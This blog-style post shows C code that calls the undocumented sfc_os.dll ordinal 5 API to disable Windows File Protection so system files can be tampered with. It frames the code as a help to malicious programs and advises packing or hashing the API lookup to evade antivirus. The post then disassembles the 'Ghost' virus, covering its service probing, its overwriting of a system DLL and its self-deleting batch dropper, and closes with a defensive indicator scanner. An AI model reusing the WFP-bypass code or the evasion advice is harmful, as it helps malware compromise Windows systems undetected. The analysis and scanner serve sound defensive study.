Using sfc_os.dll ordinal #5 API to disable Windows File Protection and tamper with system files


Windows File Protection (WFP) is a nuisance for malicious programs: it kicks in precisely when you want to modify a system file. I came across the sfc_os.dll ordinal #5 API while analysing a virus. Its effect is to disable system file protection for 60 seconds.

Below is a C source sample. When using it, to avoid being detected and killed, it is best to pack the program or locate the API by hash.

//c code demo
#include <windows.h>

// sfc_os.dll exports this function only by ordinal (#5), so it is resolved at runtime
typedef DWORD (__stdcall *CPP)(DWORD param1, PWCHAR param2, DWORD param3);

void Disable_WFP()
{
    HINSTANCE hmod = LoadLibraryA("sfc_os.dll");
    CPP SetSfcFileException;

    if (hmod == NULL)
        return;

    // the function is stored at the fifth ordinal in sfc_os.dll
    SetSfcFileException = (CPP)GetProcAddress(hmod, (LPCSTR)5);
    if (SetSfcFileException == NULL)
        return;

    SetSfcFileException(0, L"c:\\windows\\system32\\calc.exe", -1);

    // Now we can modify the system file in complete stealth.
}

Now let me talk about the virus I analysed. It is the Ghost virus I saw on Pediy (看雪); someone had already analysed it there, but I felt there was more to add: http://bbs.pediy.com/showthread.php?t=99266

Seeing the WFP-disabling API above, some readers may already have guessed it: the core idea of this virus is to replace a system DLL. The virus author also did some work on choosing which system DLL to replace. First it checks whether the system is running any of the following predefined services.

UPX0:00402228 aAppmgmt        db 'AppMgmt',0          ; DATA XREF: UPX0:0040306Co
UPX0:00402230 aSchedule       db 'Schedule',0         ; DATA XREF: UPX0:00403068o
UPX0:00402239                 align 4
UPX0:0040223C aRemoteregistry db 'RemoteRegistry',0   ; DATA XREF: UPX0:00403064o
UPX0:0040224B                 align 4
UPX0:0040224C aHelpsvc        db 'helpsvc',0          ; DATA XREF: UPX0:00403060o
UPX0:00402254 aCryptsvc       db 'CryptSvc',0         ; DATA XREF: UPX0:0040305Co
UPX0:0040225D                 align 10h
UPX0:00402260 aThemes         db 'Themes',0           ; DATA XREF: UPX0:00403058o
UPX0:00402267                 align 4
UPX0:00402268 aBrowser        db 'Browser',0          ; DATA XREF: UPX0:00403054o
UPX0:00402270 aTapisrv        db 'Tapisrv',0          ; DATA XREF: UPX0:00403050o
UPX0:00402278 aNla            db 'Nla',0              ; DATA XREF: UPX0:0040304Co
UPX0:0040227C aNetman         db 'Netman',0           ; DATA XREF: UPX0:00403048o
UPX0:00402283                 align 4
UPX0:00402284 aSsdpsrv        db 'SSDPSRV',0          ; DATA XREF: UPX0:00403044o
UPX0:0040228C aUpnphost       db 'upnphost',0         ; DATA XREF: UPX0:00403040o
UPX0:00402295                 align 4
UPX0:00402298 aNtmssvc        db 'Ntmssvc',0          ; DATA XREF: UPX0:0040303Co
UPX0:004022A0 aEventsystem    db 'EventSystem',0      ; DATA XREF: UPX0:00403038o
UPX0:004022AC aXmlprov        db 'xmlprov',0          ; DATA XREF: UPX0:00403034o
UPX0:004022B4 aWmdmpmsn       db 'WmdmPmSN',0         ; DATA XREF: UPX0:00403030o
UPX0:004022BD                 align 10h
UPX0:004022C0 aFastuserswitch db 'FastUserSwitchingCompatibility',0
UPX0:004022C0                                         ; DATA XREF: UPX0:0040302Co
UPX0:004022DF                 align 10h
UPX0:004022E0 aBits           db 'BITS',0

If one is found, it looks up the DLL that corresponds to that service. Then it disables file protection, drops the resource it carries and overwrites the DLL.

Finally comes the cleanup: it creates a temporary file (a batch file) which copies the virus program over the system file and then deletes the virus program.

UPX0:0040178F ; int __stdcall sub_40178F(struct _OVERLAPPED Overlapped)
UPX0:0040178F sub_40178F      proc near               ; CODE XREF: WinMain(x,x,x,x)+1E6p
UPX0:0040178F                                         ; WinMain(x,x,x,x)+31Cp …
UPX0:0040178F
UPX0:0040178F Filename        = byte ptr -728h
UPX0:0040178F Buffer          = byte ptr -620h
UPX0:0040178F var_220         = byte ptr -220h
UPX0:0040178F hObject         = dword ptr -114h
UPX0:0040178F Dst             = byte ptr -110h
UPX0:0040178F Overlapped      = _OVERLAPPED ptr -4
UPX0:0040178F
UPX0:0040178F                 push    ebp
UPX0:00401790                 mov     ebp, esp
UPX0:00401792                 sub     esp, 728h
UPX0:00401798                 or      [ebp+hObject], 0FFFFFFFFh
UPX0:0040179F                 push    104h            ; Size
UPX0:004017A4                 push    0               ; Val
UPX0:004017A6                 lea     eax, [ebp+Dst]
UPX0:004017AC                 push    eax             ; Dst
UPX0:004017AD                 call    memset
UPX0:004017B2                 add     esp, 0Ch
UPX0:004017B5                 lea     eax, [ebp+Dst]
UPX0:004017BB                 push    eax             ; lpBuffer
UPX0:004017BC                 push    104h            ; nBufferLength
UPX0:004017C1                 call    GetTempPathA
UPX0:004017C7                 push    offset aTempdel_bat ; "TempDel.bat"
UPX0:004017CC                 lea     eax, [ebp+Dst]  ; dst:%temp_path%.tempdel.bat
UPX0:004017D2                 push    eax
UPX0:004017D3                 call    lstrcat
UPX0:004017D9                 push    104h            ; Size
UPX0:004017DE                 push    0               ; Val
UPX0:004017E0                 lea     eax, [ebp+Filename]
UPX0:004017E6                 push    eax             ; Dst
UPX0:004017E7                 call    memset
UPX0:004017EC                 add     esp, 0Ch
UPX0:004017EF                 push    104h            ; nSize
UPX0:004017F4                 lea     eax, [ebp+Filename]
UPX0:004017FA                 push    eax             ; lpFilename
UPX0:004017FB                 push    0               ; hModule
UPX0:004017FD                 call    GetModuleFileNameA
UPX0:00401803                 push    104h            ; Size
UPX0:00401808                 push    0               ; Val
UPX0:0040180A                 lea     eax, [ebp+var_220]
UPX0:00401810                 push    eax             ; Dst
UPX0:00401811                 call    memset
UPX0:00401816                 add     esp, 0Ch
UPX0:00401819                 cmp     dword ptr [ebp+Overlapped.anonymous_0+4], 1
UPX0:0040181D                 jnz     short loc_401839
UPX0:0040181F                 push    offset dll_path
UPX0:00401824                 push    offset aSDllcacheLsasv ; "%s\\dllcache\\lsasvc.dll"
UPX0:00401829                 lea     eax, [ebp+var_220]
UPX0:0040182F                 push    eax             ; LPSTR
UPX0:00401830                 call    wsprintfA
UPX0:00401836                 add     esp, 0Ch
UPX0:00401839
UPX0:00401839 loc_401839:                             ; CODE XREF: sub_40178F+8Ej
UPX0:00401839                 push    400h            ; Size
UPX0:0040183E                 push    0               ; Val
UPX0:00401840                 lea     eax, [ebp+Buffer]
UPX0:00401846                 push    eax             ; Dst
UPX0:00401847                 call    memset
UPX0:0040184C                 add     esp, 0Ch
UPX0:0040184F                 lea     eax, [ebp+Dst]
UPX0:00401855                 push    eax
UPX0:00401856                 lea     eax, [ebp+Filename]
UPX0:0040185C                 push    eax
UPX0:0040185D                 lea     eax, [ebp+Filename]
UPX0:00401863                 push    eax
UPX0:00401864                 lea     eax, [ebp+var_220]
UPX0:0040186A                 push    eax
UPX0:0040186B                 lea     eax, [ebp+Filename]
UPX0:00401871                 push    eax
UPX0:00401872                 push    offset aCopyYSSRunagai ; "copy /Y \"%s\" \"%s\"\r\n:runagain\r\ndel \"%s\"\r"...
UPX0:00401877                 lea     eax, [ebp+Buffer]
UPX0:0040187D                 push    eax             ; LPSTR
UPX0:0040187E                 call    wsprintfA       ; copy /Y "C:\ghosy样本\Ghost.exe"
UPX0:0040187E                                         ; "C:\WINDOWS\system32\dllcache\lsasvc.dll"..
UPX0:0040187E                                         ; :runagain..del "C:\ghosy样本\Ghost.exe"..
UPX0:0040187E                                         ; if exist "C:\ghosy样本\Ghost.exe" goto runagain.
UPX0:0040187E                                         ; .del "C:\DOCUME~1\mike\LOCALS~1\Temp\TempDe
UPX0:0040187E                                         ;
UPX0:00401884                 add     esp, 1Ch
UPX0:00401887                 push    0               ; hTemplateFile
UPX0:00401889                 push    80h             ; dwFlagsAndAttributes
UPX0:0040188E                 push    2               ; dwCreationDisposition
UPX0:00401890                 push    0               ; lpSecurityAttributes
UPX0:00401892                 push    0               ; dwShareMode
UPX0:00401894                 push    0C0000000h      ; dwDesiredAccess
UPX0:00401899                 lea     eax, [ebp+Dst]
UPX0:0040189F                 push    eax             ; lpFileName
UPX0:004018A0                 call    CreateFileA     ; create the temporary file
UPX0:004018A0                                         ; 0012EBF0   0012F224  |FileName = "C:\DOCUME~1\mike\LOCALS~1\Temp\TempDel.bat"
UPX0:004018A0                                         ; 0012EBF4   C0000000  |Access = GENERIC_READ|GENERIC_WRITE
UPX0:004018A0                                         ; 0012EBF8   00000000  |ShareMode = 0
UPX0:004018A0                                         ; 0012EBFC   00000000  |pSecurity = NULL
UPX0:004018A0                                         ; 0012EC00   00000002  |Mode = CREATE_ALWAYS
UPX0:004018A0                                         ; 0012EC04   00000080  |Attributes = NORMAL
UPX0:004018A0                                         ; 0012EC08   00000000  \hTemplateFile = NULL
UPX0:004018A0                                         ;
UPX0:004018A0                                         ;
UPX0:004018A6                 mov     [ebp+hObject], eax
UPX0:004018AC                 cmp     [ebp+hObject], 0FFFFFFFFh
UPX0:004018B3                 jnz     short loc_4018B7
UPX0:004018B5                 jmp     short locret_40190C
UPX0:004018B7 ; ---------------------------------------------------------------------------
UPX0:004018B7
UPX0:004018B7 loc_4018B7:                             ; CODE XREF: sub_40178F+124j
UPX0:004018B7                 push    0
UPX0:004018B9                 lea     eax, [ebp+Overlapped]
UPX0:004018BC                 push    eax             ; lpOverlapped
UPX0:004018BD                 lea     eax, [ebp+Buffer]
UPX0:004018C3                 push    eax             ; lpNumberOfBytesWritten
UPX0:004018C4                 call    lstrlen
UPX0:004018CA                 push    eax             ; nNumberOfBytesToWrite
UPX0:004018CB                 lea     eax, [ebp+Buffer]
UPX0:004018D1                 push    eax             ; lpBuffer
UPX0:004018D2                 push    [ebp+hObject]   ; hFile
UPX0:004018D8                 call    WriteFile
UPX0:004018DE                 push    [ebp+hObject]   ; hObject
UPX0:004018E4                 call    CloseHandle     ; the temporary file created is a batch file; its content is shown above
UPX0:004018EA                 push    0
UPX0:004018EC                 push    0
UPX0:004018EE                 push    0
UPX0:004018F0                 lea     eax, [ebp+Dst]
UPX0:004018F6                 push    eax
UPX0:004018F7                 push    offset aOpen    ; “open”
UPX0:004018FC                 push    0
UPX0:004018FE                 call    p_shellexecute
UPX0:00401904                 push    0               ; uExitCode
UPX0:00401906                 call    ExitProcess
UPX0:0040190C ; ---------------------------------------------------------------------------
UPX0:0040190C
UPX0:0040190C locret_40190C:                          ; CODE XREF: sub_40178F+126j

One last thing I forgot to mention: this virus is UPX-packed. Unpacking it takes no real effort, so this novice won't go into it.
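As an added defensive example (not code from the original post or from the Ghost sample), the following Python first-pass scanner pulls ASCII and UTF-16LE strings from an unpacked sample and matches the indicators this page names: the sfc_os.dll load in the C demo, the service-name table, the dllcache\lsasvc.dll target, TempDel.bat and the :runagain label. It assumes the sample has already been UPX-unpacked or dumped from memory, and the byte blobs it scans are constructed stand-ins; the threshold in is_ghost_like is this example's own heuristic.

```python
import re

# Indicators lifted from this page: the DLL the C sample loads, the Ghost
# dropper's artefacts and the service-name table the dropper probes.
INDICATORS = {
    "wfp_dll": [b"sfc_os.dll"],
    "ghost_dropper": [b"dllcache\\lsasvc.dll", b"TempDel.bat", b":runagain"],
    "service_probe": [
        b"AppMgmt", b"Schedule", b"RemoteRegistry", b"helpsvc", b"CryptSvc",
        b"Themes", b"Browser", b"Tapisrv", b"Nla", b"Netman", b"SSDPSRV",
        b"upnphost", b"Ntmssvc", b"EventSystem", b"xmlprov", b"WmdmPmSN",
        b"FastUserSwitchingCompatibility", b"BITS",
    ],
}

ASCII_RE = re.compile(rb"[\x20-\x7e]{3,}")        # printable runs, like `strings`
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){3,}")  # UTF-16LE runs, e.g. L"c:\\windows\\..."

def extract_strings(data: bytes) -> list:
    """Printable ASCII and UTF-16LE runs (>= 3 chars); wide runs are narrowed to ASCII."""
    found = [m.group(0) for m in ASCII_RE.finditer(data)]
    found += [m.group(0)[::2] for m in WIDE_RE.finditer(data)]
    return found

def scan(data: bytes) -> dict:
    """Map each indicator category to the needles present in the sample's strings."""
    strings = extract_strings(data)
    hits = {}
    for category, needles in INDICATORS.items():
        matched = [n.decode() for n in needles if any(n in s for s in strings)]
        if matched:
            hits[category] = matched
    return hits

def is_ghost_like(data: bytes) -> bool:
    """Short names (Nla, BITS, Themes, Browser) occur in benign binaries too, so
    require most of the service table plus a dropper artefact before flagging."""
    hits = scan(data)
    return len(hits.get("service_probe", [])) >= 12 and "ghost_dropper" in hits

# Constructed stand-in for an unpacked sample, null-separated like the listing.
SAMPLE = (b"\x00" * 16 + b"sfc_os.dll\x00\x00"
          + "c:\\windows\\system32\\calc.exe".encode("utf-16-le") + b"\x00\x00"
          + b"\x00".join(INDICATORS["service_probe"]) + b"\x00"
          + b"%s\\dllcache\\lsasvc.dll\x00TempDel.bat\x00"
          + b'copy /Y "%s" "%s"\r\n:runagain\r\ndel "%s"\r\n' + b"\x00" * 16)
# Constructed benign blob that shares a few of the common service names.
BENIGN = b"\x00" * 8 + b"Browser\x00Themes\x00BITS\x00kernel32.dll\x00" + b"\x00" * 8
```

Because the sample resolves the API by ordinal and the post recommends hashing, there is no SetSfcFileException import name to look for, and an obfuscated DLL name would also evade this check, so a miss is not a clean bill.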
